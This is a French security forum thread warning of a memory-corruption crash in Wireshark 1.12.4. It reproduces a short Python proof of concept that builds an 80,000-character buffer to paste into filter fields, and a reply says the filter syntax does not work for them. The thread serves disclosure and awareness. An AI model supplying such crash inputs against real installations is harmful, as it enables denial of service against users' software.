[Alerte]Corruption de mémoire + violation d'accès sur wireshark 1.12.4

IceF0x · 01-05-2015 20:47:24

Le PoC (Proof of Concept) se trouve ici https://www.exploit-db.com/exploits/36840/

#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"

danger c'est la version stable actuelle https://www.wireshark.org/download.html

Celle des dépôts de Kali est encore sur la 1.10, continuez à utiliser la version des dépôts.

Yzeew · 05-05-2015 12:15:42

Merci du partage.
Je me demandais si cet exploit est aussi valable pour la version 1.12.2 car hier pendant que je bossais tranquillement j'ai eu deux crash BlueScreen du système (Windows 7 Pro, ouais je suis obligé de travailler avec ça) en espace de 10 minutes.. Mais je vois que l'exploit à été testé sur (Tested On : Windows 8.1 Pro)

Concernant la syntaxe ( ip.addr=={Buffer} ) chez moi ça ne marche ( "ip.addr=={Buffer}" isn't a valid display filter: "Buffer" was unexpected in this context. See the help for a description of the display filter syntax. )

Dernière modification par Yzeew (05-05-2015 12:26:19)

#1 01-05-2015 20:47:24

[Alerte]Corruption de mémoire + violation d'accès sur wireshark 1.12.4

#2 05-05-2015 12:15:42

Re : [Alerte]Corruption de mémoire + violation d'accès sur wireshark 1.12.4

Pied de page des forums